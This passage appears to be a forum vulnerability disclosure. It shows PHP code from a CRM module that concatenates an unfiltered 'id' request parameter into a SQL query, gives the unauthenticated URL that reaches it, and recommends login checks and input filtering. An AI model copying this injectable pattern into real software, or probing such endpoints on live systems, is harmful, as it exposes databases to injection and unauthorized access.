        $db = $this->loadDB();
        $id_array = array();
        $id = $_REQUEST['id'];
        $id_array = explode(",",$id);
        // fetch the notice content
        $sql = "SELECT * FROM crm_notify where nid in (".$id.")";
        $tmp_result = $db->GetAll( $sql );
        // ... remainder omitted

The constructed URL is:

userweb/index.php?module=seatMonitor&action=DaPingNotify&id=1

[Screenshot: 7.png]

[Screenshot: 8.png]















Proof of vulnerability:

[Screenshot: 4.png]

[Screenshot: 7.png]

Fix:

Add the missing login-check calls, strengthen parameter filtering, and pay attention to single-quote protection.

#1
Posted: 2016-7-11 | Views: 0 | Replies: 0